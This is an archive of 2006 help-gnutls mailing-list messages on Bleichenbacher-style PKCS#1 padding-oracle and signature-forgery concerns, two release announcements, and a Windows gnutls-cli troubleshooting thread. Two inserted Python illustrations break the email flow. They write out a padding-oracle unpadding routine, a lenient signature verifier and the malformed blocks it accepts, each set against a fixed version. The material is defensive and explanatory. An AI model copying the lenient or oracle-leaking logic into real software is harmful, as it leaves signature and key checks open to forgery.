Subject: [Help-gnutls] Re: Bleichenbacher RSA signature forgery attack and GnuTLS
In-Reply-To: <87wt8ewjjh.fsf@latte.josefsson.org> (Simon Josefsson's message of "Fri\, 08 Sep 2006 15\:54\:26 +0200")
References: <87lkoupsyv.fsf@latte.josefsson.org> <87wt8ewjjh.fsf@latte.josefsson.org>
Message-ID: <87k64av92v.fsf@latte.josefsson.org>

Simon Josefsson writes:

> Simon Josefsson writes:
>
>> _gnutls_handshake_log ("PKCS #1 padding error");
>> ret = GNUTLS_E_PKCS1_WRONG_PAD;
>
> Werner Koch points out that this error message may result in a
> vulnerability similar to Bleichenbacher's Crypto 98 attack. It is not
> exactly the same situation -- Bleichenbacher talks about PKCS#1
> encryption (block type 1, uses random padding) where this deals with
> PKCS#1 verification (block type 2, uses 0xFF padding) -- but at a
> glance, it appears to have similar consequences, but differ in the
> number of messages required to mount the attack.

Nikos points out that we have already protected against that attack, for TLS sessions, in auth_rsa.c:

  ret = _gnutls_pkcs1_rsa_decrypt (&plaintext, &ciphertext, params, params_len, 2);	/* btype==2 */

  if (ret < 0 || plaintext.size != TLS_MASTER_SIZE)
    {
      /* In case decryption fails then don't inform
       * the peer. Just use a random key. (in order to avoid
       * attack against pkcs-1 formating).
       */
      gnutls_assert ();
      _gnutls_x509_log ("auth_rsa: Possible PKCS #1 format attack\n");
      randomize_key = 1;
    }
  else
    {
      /* If the secret was properly formatted, then
       * check the version number.
       */
      if (_gnutls_get_adv_version_major (session) != plaintext.data[0]
          || _gnutls_get_adv_version_minor (session) != plaintext.data[1])
        {
          /* No error is returned here, if the version number check
           * fails. We proceed normally.
           * That is to defend against the attack described in the paper
           * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima,
           * Ondřej Pokorny and Tomas Rosa.
*/ gnutls_assert (); _gnutls_x509_log ("auth_rsa: Possible PKCS #1 version check format attack\n"); } } The GNUTLS-SA-2006-3 security advisory thus was a false alarm, but I'm keeping the information on: http://www.gnu.org/software/gnutls/security.html I'll add a link to this post, though. There should be no harm in applying the patch, though. Note 1: If someone is worried about the log file being used as the oracle here, don't be: the above log statements are only executed if in debug mode, and this isn't recommended nor typical behaviour. Note 2: I'd be interested in if someone could establish whether it is possible to extend this oracle attack from error codes to different timings. In other words, if it takes different amount of time to verify a signature depending on the padding error. /Simon > > /Simon > > Index: gnutls_pk.c > =================================================================== > RCS file: /cvs/gnutls/gnutls/lib/gnutls_pk.c,v > retrieving revision 1.82 > retrieving revision 1.83 > diff -u -p -r1.82 -r1.83 > --- gnutls_pk.c 15 Dec 2005 13:24:29 -0000 1.82 > +++ gnutls_pk.c 8 Sep 2006 13:19:29 -0000 1.83 > @@ -1,5 +1,5 @@ > /* > - * Copyright (C) 2001, 2002, 2003, 2004, 2005 Free Software Foundation > + * Copyright (C) 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation > * > * Author: Nikos Mavroyanopoulos > * > @@ -265,8 +265,13 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ > > _gnutls_mpi_release (&res); > > - /* EB = 00||BT||PS||00||D > + /* EB = 00||BT||PS||00||D > * (use block type 'btype') > + * > + * From now on, return GNUTLS_E_DECRYPTION_FAILED on errors, to > + * avoid attacks similar to the one described by Bleichenbacher in: > + * "Chosen Ciphertext Attacks against Protocols Based on RSA > + * Encryption Standard PKCS #1". > */ 
> > > @@ -303,8 +308,8 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ > } > if (edata[i] != 0xff) > { > - _gnutls_handshake_log ("PKCS #1 padding error"); > - ret = GNUTLS_E_PKCS1_WRONG_PAD; > + /* PKCS #1 padding error. Don't use > + GNUTLS_E_PKCS1_WRONG_PAD here. */ > break; > } > } > @@ -312,7 +317,6 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ > default: > gnutls_assert (); > gnutls_afree (edata); > - return GNUTLS_E_INTERNAL_ERROR; > } > i++; From jas at extundo.com Tue Sep 12 16:35:42 2006 
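The countermeasure quoted from auth_rsa.c above, as an added Python example (not GnuTLS code) that generalizes it: the oracle shape and the silent shape applied to the same decrypted blocks. The RSA operation itself is left out because the oracle lives entirely in what the server does with the decrypted block; pad_type2 is a constructed stand-in for the client side. The version check follows RFC 5246 section 7.4.7.1 (treat a mismatch like bad padding and substitute a random premaster) rather than the log-and-continue in the quoted code, which is an assumption of this example, not GnuTLS behaviour. Python offers no constant-time guarantee; the point is the control-flow shape and that nothing is reported.

```python
import os

PREMASTER_LEN = 48          # TLS_MASTER_SIZE in the quoted auth_rsa.c


def pad_type2(secret, k):
    """PKCS#1 v1.5 block type 2 as the client builds it: 00 02 || PS (nonzero random) || 00 || M.
    Constructed here only to make test blocks."""
    ps = b""
    while len(ps) < k - 3 - len(secret):
        b = os.urandom(1)
        ps += b if b != b"\x00" else b""
    return b"\x00\x02" + ps + b"\x00" + secret


def unpad_oracle(em, client_version):
    """The shape to avoid: distinct error classes and early exits. Every branch that the peer
    can tell apart is a bit for a Bleichenbacher '98 attacker; the version branch is the extra
    bit described by Klima, Pokorny and Rosa."""
    if em[:2] != b"\x00\x02":
        raise ValueError("wrong block type")
    sep = em.find(b"\x00", 2)
    if sep < 10:
        raise ValueError("padding too short")
    pms = em[sep + 1:]
    if len(pms) != PREMASTER_LEN:
        raise ValueError("wrong premaster length")
    if pms[:2] != client_version:
        raise ValueError("version mismatch")
    return pms


def unpad_no_oracle(em, client_version):
    """The shape the quoted auth_rsa.c moves to: look at every byte, report nothing, and on any
    failure hand back a random premaster so the handshake dies at Finished the same way every time."""
    k = len(em)
    sep = k - PREMASTER_LEN - 1            # where the 00 separator must sit for a 48-byte premaster
    ok = int(sep >= 10) & int(em[0] == 0x00) & int(em[1] == 0x02) & int(em[sep] == 0x00)
    for b in em[2:sep]:                    # no break: iteration count does not depend on the data
        ok &= int(b != 0)
    pms = em[sep + 1:]
    ok &= int(pms[0] == client_version[0]) & int(pms[1] == client_version[1])
    fallback = os.urandom(PREMASTER_LEN)   # drawn unconditionally, selected only on failure
    return pms if ok else fallback


def demo(k=128):
    """Feed the same blocks to both routines; returns (oracle outcome, secret recovered, length)."""
    version = b"\x03\x01"
    secret = version + os.urandom(PREMASTER_LEN - 2)
    blocks = {"good": pad_type2(secret, k),
              "bad_type": b"\x00\x01" + pad_type2(secret, k)[2:],
              "bad_version": pad_type2(b"\x03\x03" + secret[2:], k)}
    out = {}
    for name, em in blocks.items():
        try:
            unpad_oracle(em, version)
            seen = "accepted"
        except ValueError as exc:
            seen = str(exc)
        r = unpad_no_oracle(em, version)
        out[name] = (seen, r == secret, len(r))
    return out
```

Run demo() and the first tuple element shows what each malformed block tells an attacker through the oracle routine; the silent routine's result differs from the true secret for both bad blocks, but an observer sees only a 48-byte value and, later, a failed Finished, identical for every failure cause. The remaining question from the thread, whether timing can replace the error code as the oracle, is exactly why the silent routine avoids the early break.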
From: jas at extundo.com (Simon Josefsson)
Date: Tue, 12 Sep 2006 16:35:42 +0200
Subject: [Help-gnutls] GnuTLS 1.4.4
Message-ID: <87zmd5b1a9.fsf@latte.josefsson.org>

I am happy to announce GnuTLS 1.4.4, a bugfix release on the stable 1.4 branch. This version is what we recommend for those who need a stable version of GnuTLS.

GnuTLS is a modern C library that implements the standard network security protocol Transport Layer Security (TLS), for use by network applications.

Noteworthy changes since 1.4.3:

** Relax the test that caught signatures that exploit the variant of
** Bleichenbacher's Crypto 06 rump session attack on our
** verification logic flaw.
In particular, we now permit the digestAlgorithm.parameters field to be present but empty, whereas in 1.4.3 we actually checked that the field was absent.

** Revert the removal of debug information for the GNUTLS-SA-2006-3 problem.
The messages are only printed in debug mode, which is not recommended for normal use, and thus logging this situation cannot be abused as an oracle in typical recommended situations.

Note that this release does not contain any security fixes compared to 1.4.3; however, it does fix a crash that was introduced by 1.4.3, and it also fixes false negatives when verifying certificates. Thus, users are strongly encouraged to upgrade to this version.

Improving GnuTLS is costly, but you can help! We are looking for organizations that find GnuTLS useful and wish to contribute back. You can contribute by reporting bugs, improving the software, or donating money or equipment.

Commercial support contracts for GnuTLS are available, and they help finance continued maintenance. Simon Josefsson Datakonsult, a Stockholm based privately held company, is currently funding GnuTLS maintenance. We are always looking for interesting development projects. See http://josefsson.org/ for more details.
All manual formats are available from:
http://www.gnutls.org/manual/

Direct link to the most popular formats:
http://www.gnutls.org/manual/gnutls.html - HTML format
http://www.gnutls.org/manual/gnutls.pdf - PDF format
http://www.gnutls.org/reference/ch01.html - API Reference, GTK-DOC HTML

If you need help to use GnuTLS, or want to help others, you are invited to join our help-gnutls mailing list, see: .

The project page of the library is available at:
http://www.gnutls.org/
http://www.gnu.org/software/gnutls/
http://josefsson.org/gnutls/

Here are the compressed sources (3.9MB):
http://josefsson.org/gnutls/releases/gnutls-1.4.4.tar.bz2

Here are GPG detached signatures signed using key 0xB565716F:
http://josefsson.org/gnutls/releases/gnutls-1.4.4.tar.bz2.sig

The software is cryptographically signed by the author using an OpenPGP key identified by the following information:

pub   1280R/B565716F 2002-05-05 [expires: 2007-02-15]
uid                  Simon Josefsson
uid                  Simon Josefsson
sub   1280R/4D5D40AE 2002-05-05 [expires: 2007-02-15]
sub   1024R/09CC4670 2006-03-18 [expires: 2007-04-22]
sub   1024R/AABB1F7B 2006-03-18 [expires: 2007-04-22]
sub   1024R/A14C401A 2006-03-18 [expires: 2007-04-22]

The key is available from:
http://josefsson.org/key.txt
dns:b565716f.josefsson.org?TYPE=CERT

Here are the SHA-1 and SHA-224 checksums:

8f6ee112c8d93dd726e8e3d0e3fbf234f085a2cd  gnutls-1.4.4.tar.bz2
a72377bccf8d49421f7f5f4e0ff85b489ef4d8d1  gnutls-1.4.4.tar.bz2.sig

a357b06cecc3ed5b79d98a26c08bc0b4137aa90bb6453e10a5845681  gnutls-1.4.4.tar.bz2
9aad60797aa994fbac8fd0b8ec6127acfa0c01a75680a6520dc28fc1  gnutls-1.4.4.tar.bz2.sig

Enjoy,
Nikos and Simon

From jas at extundo.com Thu Sep 21 16:37:43 2006
From: jas at extundo.com (Simon Josefsson)
Date: Thu, 21 Sep 2006 16:37:43 +0200
Subject: [Help-gnutls] GnuTLS 1.5.1 - experimental
Message-ID: <87y7sd4760.fsf@latte.josefsson.org>

I am happy to announce GnuTLS 1.5.1, the second release on our current development branch. We still recommend the 1.4.x branch as the stable version.

One goal with the 1.5.x branch is to make Windows x86 a supported platform for GnuTLS. We do this by providing a binary Windows installer of GnuTLS, cross-compiled from GNU/Linux using MinGW and NSIS. The installer is (lightly) tested on Windows 2000 and Windows XP. It is possible to develop applications in Visual Studio or MinGW that link to the library. See a separate announcement for the binary installer for this release.

And yes, the patches for the security problem fixed by 1.4.4 are included in this release too.

GnuTLS is a modern C library that implements the standard network security protocol Transport Layer Security (TLS), for use by network applications.

* Version 1.5.1 (released 2006-09-21)

** Fix PKCS#1 verification to avoid a variant of Bleichenbacher's
** Crypto 06 rump session attack.
In particular, we check that the digestAlgorithm.parameters field is missing or empty, to avoid that it can contain "garbage" that may be used to alter the numeric properties of the signature. See (which is not exactly the same as the problem we fix here). Reported by Yutaka OIWA. See GNUTLS-SA-2006-4 on http://www.gnutls.org/security.html for more up to date information.

** Add self test to test for above flaw.

** Fix gnutls-cli-debug regarding resume support detection.
Earlier, if the session-id from the server had a length of 0, it would indicate that the server supports resumption, which isn't the case. Reported by Kataja Kai.

** Fix building of examples on FreeBSD by including netinet/in.h.
Reported by Roman Bogorodskiy.
** Fix certtool bug that caused the private key to not be loaded when
generating a certificate with --load-request, which in turn triggered
another unrelated bug in gnutls_x509_crt_sign2 (also fixed).
Reported by Sascha Ziemann.

** gnutls-cli and gnutls-serv work on Windows.
The problem was the select() call that doesn't work on file descriptors
(stdin) on Windows.  We borrowed some code from plibc to solve this.
It appears to be somewhat unreliable though.

** Autoconf 2.60 is now used.

** API and ABI modifications:
No changes since last version.

Improving GnuTLS is costly, but you can help!  We are looking for
organizations that find GnuTLS useful and wish to contribute back.  You
can contribute by reporting bugs, improving the software, or donating
money or equipment.

Commercial support contracts for GnuTLS are available, and they help
finance continued maintenance.  Simon Josefsson Datakonsult, a Stockholm
based privately held company, is currently funding GnuTLS maintenance.
We are always looking for interesting development projects.  See
http://josefsson.org/ for more details.

All manual formats are available from:

  http://www.gnutls.org/manual/

Direct link to the most popular formats:

  http://www.gnutls.org/manual/gnutls.html - HTML format
  http://www.gnutls.org/manual/gnutls.pdf - PDF format
  http://www.gnutls.org/reference/ch01.html - API Reference, GTK-DOC HTML

If you need help to use GnuTLS, or want to help others, you are invited
to join our help-gnutls mailing list, see: .
The project page of the library is available at:

  http://www.gnutls.org/
  http://www.gnu.org/software/gnutls/
  http://josefsson.org/gnutls/ (updated fastest)

Here are the compressed sources (4.1MB):

  http://josefsson.org/gnutls/releases/gnutls-1.5.1.tar.bz2
  ftp://ftp.gnutls.org/pub/gnutls/devel/gnutls-1.5.1.tar.bz2

Here are GPG detached signatures signed using key 0xB565716F:

  http://josefsson.org/gnutls/releases/gnutls-1.5.1.tar.bz2.sig
  ftp://ftp.gnutls.org/pub/gnutls/devel/gnutls-1.5.1.tar.bz2.sig

The software is cryptographically signed by the author using an OpenPGP
key identified by the following information:

pub  1280R/B565716F 2002-05-05 [expires: 2007-02-15]
uid                  Simon Josefsson
uid                  Simon Josefsson
sub  1280R/4D5D40AE 2002-05-05 [expires: 2007-02-15]
sub  1024R/09CC4670 2006-03-18 [expires: 2007-04-22]
sub  1024R/AABB1F7B 2006-03-18 [expires: 2007-04-22]
sub  1024R/A14C401A 2006-03-18 [expires: 2007-04-22]

The key is available from:

  http://josefsson.org/key.txt
  dns:b565716f.josefsson.org?TYPE=CERT

Here are the SHA-1 and SHA-224 checksums:

116cdb641fe176b4f834a2709635eeeb3bf0dd73  gnutls-1.5.1.tar.bz2
ab2a7e281c288bd928dd7fc750e75ff3beb913b6  gnutls-1.5.1.tar.bz2.sig

ebf5fadf425f93f04d1eddd71a0940a2d3a97455393be1cb38d92fc5  gnutls-1.5.1.tar.bz2
c5d049ab7df89053b7634285c74c9036963599caba7d6584c4abd14c  gnutls-1.5.1.tar.bz2.sig

Enjoy,
Nikos and Simon

From jas at extundo.com Thu Sep 21 17:21:10 2006
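The PKCS#1 check described in the 1.5.1 announcement above, as an added illustration that is not GnuTLS code and not part of the original thread: a lenient verifier that walks the DER of the DigestInfo and ignores whatever sits in digestAlgorithm.parameters (or after the DigestInfo), beside a strict verifier that compares the decoded block against the exact expected encoding, which is the comparison RFC 3447 section 8.2.2 prescribes and which rejects both the parameters variant the announcement fixes and the classic trailing-garbage variant. The example operates on the encoded message EM, the bytes obtained after the RSA public-key operation, so no key is involved; SHA-1, the 1024-bit block size, the message and the garbage bytes are all constructed for the demonstration. It only shows that a lax parser accepts a malformed block; it does not show how such a block is turned into a forged signature.

```python
"""Strict vs. lenient checking of the DigestInfo inside a PKCS#1 v1.5
signature block (EMSA-PKCS1-v1_5).  Added illustration of the check in the
GnuTLS 1.5.1 announcement; not GnuTLS code.  Everything here is constructed
sample data."""
import hashlib

SHA1_OID = bytes.fromhex("2b0e03021a")   # DER value of OID 1.3.14.3.2.26 (id-sha1)
DER_NULL = b"\x05\x00"                   # the parameters value PKCS#1 allows for SHA-1 (or absent)


def der_tlv(data, pos=0):
    """Read one DER tag/length/value starting at pos; return (tag, value, end).
    It deliberately does not check that the whole buffer was consumed: that is
    the laxness the lenient verifier below inherits."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                                  # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length


def build_digestinfo(digest, params=DER_NULL):
    """DigestInfo ::= SEQUENCE { SEQUENCE { OID, parameters }, OCTET STRING digest }.
    params is written verbatim into digestAlgorithm.parameters."""
    def seq(body):
        return bytes([0x30, len(body)]) + body
    alg = seq(bytes([0x06, len(SHA1_OID)]) + SHA1_OID + params)
    return seq(alg + bytes([0x04, len(digest)]) + digest)


def emsa_encode(message, k, params=DER_NULL, trailer=b""):
    """Build the k-byte block 0x00 0x01 <0xFF padding> 0x00 T.
    params stuffs the parameters field (the variant the announcement fixes);
    trailer appends bytes after the DigestInfo (the classic 2006 variant)."""
    t = build_digestinfo(hashlib.sha1(message).digest(), params) + trailer
    ps_len = k - len(t) - 3
    if ps_len < 8:
        raise ValueError("block too small for this DigestInfo")
    return b"\x00\x01" + b"\xff" * ps_len + b"\x00" + t


def strip_padding(em):
    """Return T after checking the 0x00 0x01 0xFF... 0x00 framing."""
    if em[:2] != b"\x00\x01":
        raise ValueError("bad block type")
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        raise ValueError("bad padding")
    return em[i + 1:]


def verify_lenient(em, message):
    """Walk the DER structure and check only the OID and the digest bytes.
    Bytes inside parameters, and bytes after the DigestInfo, are never looked
    at.  This is the behaviour the announcement describes as the flaw."""
    t = strip_padding(em)
    _, di, _ = der_tlv(t)            # outer SEQUENCE; anything after it is ignored
    _, alg, p = der_tlv(di)          # digestAlgorithm
    _, digest, _ = der_tlv(di, p)    # OCTET STRING
    _, oid, _ = der_tlv(alg)         # parameters following the OID are skipped
    return oid == SHA1_OID and digest == hashlib.sha1(message).digest()


def verify_strict(em, message):
    """Compare T with the exact expected encoding: parameters must be NULL or
    absent, and nothing may precede or follow the DigestInfo."""
    t = strip_padding(em)
    digest = hashlib.sha1(message).digest()
    return t in (build_digestinfo(digest, DER_NULL), build_digestinfo(digest, b""))


if __name__ == "__main__":
    k, msg = 128, b"constructed sample message"
    good = emsa_encode(msg, k)
    stuffed = emsa_encode(msg, k, params=bytes([0x04, 16]) + b"\xaa" * 16)
    trailing = emsa_encode(msg, k, trailer=b"\xaa" * 8)
    for name, em in ("well-formed", good), ("garbage in parameters", stuffed), ("garbage after DigestInfo", trailing):
        print(f"{name:26s} lenient={verify_lenient(em, msg)!s:5s} strict={verify_strict(em, msg)}")
```

The strict comparison is cheaper than a full DER parser and has no parsing corner cases to get wrong; the price is that a verifier must enumerate the encodings it is willing to accept (here NULL and absent parameters), which is the point the announcement makes.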
From: jas at extundo.com (Simon Josefsson)
Date: Thu, 21 Sep 2006 17:21:10 +0200
Subject: [Help-gnutls] GnuTLS 1.5.1 for Windows
Message-ID: <87mz8t455l.fsf@latte.josefsson.org>

Don't forget that GnuTLS is available under Windows!

The Windows installer contains the library, binaries for the command
line tools and all example programs.  The manual, in PDF and HTML
formats, together with the GTK-DOC style API reference manual in HTML,
are also included.

This release uses libgpg-error 1.4, libgcrypt 1.2.3, libtasn1 0.3.6,
and gnutls 1.5.1.  The source code for those packages, as well as the
build makefile, is also included in the installer, but is not installed
by default.

For more information, such as an explanation of how you can write
programs using Visual Studio or MinGW that use GnuTLS, see:

  http://josefsson.org/gnutls4win/

I'm interested in feedback about the package, since it is quite
experimental.  Are you able to install it?  Does it work?  Can you write
programs that link to the DLL?  I've done some testing on Windows XP.

The binary installer and PGP signature:

  http://josefsson.org/gnutls4win/gnutls-1.5.1.exe (14MB)
  http://josefsson.org/gnutls4win/gnutls-1.5.1.exe.sig

Here are the SHA-1 and SHA-224 checksums:

692c9aef88a163d9ded132e5a0dfadc981b454db  gnutls-1.5.1.exe
92b7c9bbde6de428ee8db22e814f7c3a60f5c894  gnutls-1.5.1.exe.sig

3dc6e4881880b2c81bd701a19667be55bef70a61a9ebae3ebd3074ea  gnutls-1.5.1.exe
426c1e88183fe99395b7a20ea4e6243e0b6bdce8e478d23e520972f4  gnutls-1.5.1.exe.sig

Happy hacking,
Simon

From angeli at caeruleus.net Thu Sep 21 22:21:44 2006
From: angeli at caeruleus.net (Ralf Angeli)
Date: Thu, 21 Sep 2006 22:21:44 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
References: <87mz8t455l.fsf@latte.josefsson.org>
Message-ID: 

* Simon Josefsson (2006-09-21) writes:

> Don't forget that GnuTLS is available under Windows!

Cool, thanks!

> I'm interested in feedback about the package, since it is quite
> experimental.  Are you able to install it?

Yes.

> Does it work?

I'm not sure.  I get the following when executing the first line in
cmd.exe.  The output appears till the line starting with "220".  After
that it does nothing.  When typing `C-c' for aborting the operation
the last lines (starting with "***") appear.

C:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de
Resolving 'smtp.web.de'...
Connecting to '217.72.192.157:25'...

- Simple Client Mode:

220 smtp06.web.de ESMTP WEB.DE V4.107#114 Thu, 21 Sep 2006 22:08:51 +0200
*** Starting TLS handshake
*** Fatal error: A record packet with illegal version was received.
*** Handshake has failed
^C

I am not able to send mail using smtpmail.el in Gnus either.  I am not
sure however if this is the fault of GnuTLS.  The only output after
aborting the operation (which will hang as well) I can see in the SMTP
trace buffer (`smtpmail-debug-info' set to t) is this:

220 smtp.1und1.de (mrelayeu4) Welcome to Nemesis ESMTP server^M
EHLO NEUTRINO^M
QUIT^M

-- 
Ralf

From jas at extundo.com Fri Sep 22 14:56:00 2006
From: jas at extundo.com (Simon Josefsson)
Date: Fri, 22 Sep 2006 14:56:00 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
In-Reply-To: (Ralf Angeli's message of "Thu, 21 Sep 2006 22:21:44 +0200")
References: <87mz8t455l.fsf@latte.josefsson.org>
Message-ID: <87k63w2h7j.fsf@latte.josefsson.org>

Ralf Angeli writes:

>> I'm interested in feedback about the package, since it is quite
>> experimental.  Are you able to install it?
>
> Yes.

For the record, which Windows version and service packs are you using?

>> Does it work?
>
> I'm not sure.  I get the following when executing the first line in
> cmd.exe.  The output appears till the line starting with "220".  After
> that it does nothing.  When typing `C-c' for aborting the operation
> the last lines (starting with "***") appear.
>
> C:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de
> Resolving 'smtp.web.de'...
> Connecting to '217.72.192.157:25'...
>
> - Simple Client Mode:
>
> 220 smtp06.web.de ESMTP WEB.DE V4.107#114 Thu, 21 Sep 2006 22:08:51 +0200
> *** Starting TLS handshake
> *** Fatal error: A record packet with illegal version was received.
> *** Handshake has failed
> ^C

The server is waiting for you to do something: you'll need to first
type:

STARTTLS

and wait for the server to ACK that, and then send an EOF to gnutls-cli
that tells it to start negotiating TLS.  To send an EOF, I think you
press C-z RET or possibly C-d RET.

However, gnutls-cli uses select() and there is a problem with select()
on Windows that it doesn't support file descriptors.  GnuTLS 1.5.1 has
a work-around for this, but it may be unreliable.

> I am not able to send mail using smtpmail.el in Gnus either.  I am not
> sure however if this is the fault of GnuTLS.  The only output after
> aborting the operation (which will hang as well) I can see in the SMTP
> trace buffer (`smtpmail-debug-info' set to t) is this:
>
> 220 smtp.1und1.de (mrelayeu4) Welcome to Nemesis ESMTP server^M
> EHLO NEUTRINO^M
> QUIT^M

Right, I haven't succeeded in doing that either, and there may be
Emacs bugs here: process-send-eof doesn't seem to work the same way as
on Linux.

Let's focus on getting gnutls-cli to work in a terminal first.

/Simon

From angeli at caeruleus.net Sun Sep 24 18:03:05 2006
From: angeli at caeruleus.net (Ralf Angeli)
Date: Sun, 24 Sep 2006 18:03:05 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
Message-ID: 

* Simon Josefsson (2006-09-22) writes:

> Ralf Angeli writes:
>
>>> I'm interested in feedback about the package, since it is quite
>>> experimental.  Are you able to install it?
>>
>> Yes.
>
> For the record, which Windows version and service packs are you using?

Windows XP SP2

> The server is waiting for you to do something: you'll need to first
> type:
>
> STARTTLS
>
> and wait for the server to ACK that, and then send an EOF to gnutls-cli
> that tells it to start negotiating TLS.  To send an EOF, I think you
> press C-z RET or possibly C-d RET.

Okay, it's working with C-z in cmd.exe.  (It didn't get an EOF through
in a MinGW shell, however.)

C:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de
Resolving 'smtp.web.de'...
Connecting to '217.72.192.157:25'...

- Simple Client Mode:

220 smtp05.web.de ESMTP WEB.DE V4.107#114 Sun, 24 Sep 2006 17:55:43 +0200
ehlo neutrino
250-smtp05.web.de Hello neutrino [84.165.4.58]
250-SIZE 69920427
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
starttls
220 OpenSSL/0.9.7beta go ahead
^Z
*** Starting TLS handshake
- Certificate type: X.509
 - Got a certificate list of 1 certificates.

 - Certificate[0] info:

-----BEGIN CERTIFICATE-----
MIIDZTCCAs6gAwIBAgIQIY4doat2RZ49+oHZDCyaqzANBgkqhkiG9w0BAQQFADCB
[...]
WfwOQxZdz7Gu
-----END CERTIFICATE-----

# The hostname in the certificate matches 'smtp.web.de'.
# valid since: Tue Feb 15:51:50 Westeuropäische Normalzeit 2006
# expires at: Wed Feb 15:51:50 Westeuropäische Normalzeit 2007
# fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6
# Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de
# Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com


- Peer's certificate issuer is unknown
- Peer's certificate is NOT trusted
- Version: TLS 1.0
- Key Exchange: RSA
- Cipher: AES 256 CBC
- MAC: SHA
- Compression: NULL
500 Unrecognized command
^C

> Right, I haven't succeeded in doing that either, and there may be
> Emacs bugs here: process-send-eof doesn't seem to work the same way as
> on Linux.
>
> Let's focus on getting gnutls-cli to work in a terminal first.

Okay.

-- 
Ralf

From jas at extundo.com Mon Sep 25 14:19:09 2006
From: jas at extundo.com (Simon Josefsson)
Date: Mon, 25 Sep 2006 14:19:09 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
In-Reply-To: (Ralf Angeli's message of "Sun, 24 Sep 2006 18:03:05 +0200")
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
Message-ID: <87r6y0t9z6.fsf@latte.josefsson.org>

Ralf Angeli writes:

> Okay, it's working with C-z in cmd.exe.  (It didn't get an EOF through
> in a MinGW shell, however.)

Maybe C-d works in MinGW shells?

>
> 500 Unrecognized command
> ^C

This may be because of the RET.  In Unix, you can press C-d C-d, maybe
that works under Windows?  I.e., C-z C-z.

Alternatively, maybe we should use C-c to trigger TLS negotiation...

>> Right, I haven't succeeded in doing that either, and there may be
>> Emacs bugs here: process-send-eof doesn't seem to work the same way as
>> on Linux.
>>
>> Let's focus on getting gnutls-cli to work in a terminal first.
>
> Okay.

It seems to work somewhat for you now, so the next step is to make it
work in M-x shell RET in Emacs.  Does this work?

/Simon

From angeli at caeruleus.net Mon Sep 25 19:48:54 2006
From: angeli at caeruleus.net (Ralf Angeli)
Date: Mon, 25 Sep 2006 19:48:54 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
	<87r6y0t9z6.fsf@latte.josefsson.org>
Message-ID: 

* Simon Josefsson (2006-09-25) writes:

> It seems to work somewhat for you now, so the next step is to make it
> work in M-x shell RET in Emacs.  Does this work?

Yes:

(M-x shell RET)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de
gnutls-cli --print-cert --port 25 --starttls smtp.web.de
Resolving 'smtp.web.de'...
Connecting to '217.72.192.157:25'...

- Simple Client Mode:

220 smtp05.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 19:42:24 +0200
ehlo neutrino
250-smtp05.web.de Hello neutrino [84.165.71.252]
250-SIZE 69920427
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
starttls
220 OpenSSL/0.9.7beta go ahead
*** Starting TLS handshake
- Certificate type: X.509
 - Got a certificate list of 1 certificates.

 - Certificate[0] info:

-----BEGIN CERTIFICATE-----
MIIDZTCCAs6gAwIBAgIQIY4doat2RZ49+oHZDCyaqzANBgkqhkiG9w0BAQQFADCB
[...]
WfwOQxZdz7Gu
-----END CERTIFICATE-----

# The hostname in the certificate matches 'smtp.web.de'.
# valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007
# expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007
# fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6
# Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de
# Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com


- Peer's certificate issuer is unknown
- Peer's certificate is NOT trusted
- Version: TLS 1.0
- Key Exchange: RSA
- Cipher: AES 256 CBC
- MAC: SHA
- Compression: NULL
C-c C-c^C
c:\foo>
Process shell finished

-- 
Ralf

From jas at extundo.com Mon Sep 25 20:47:59 2006
From: jas at extundo.com (Simon Josefsson)
Date: Mon, 25 Sep 2006 20:47:59 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
In-Reply-To: (Ralf Angeli's message of "Mon, 25 Sep 2006 19:48:54 +0200")
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
	<87r6y0t9z6.fsf@latte.josefsson.org>
Message-ID: <87bqp3iy00.fsf@latte.josefsson.org>

Ralf Angeli writes:

> * Simon Josefsson (2006-09-25) writes:
>
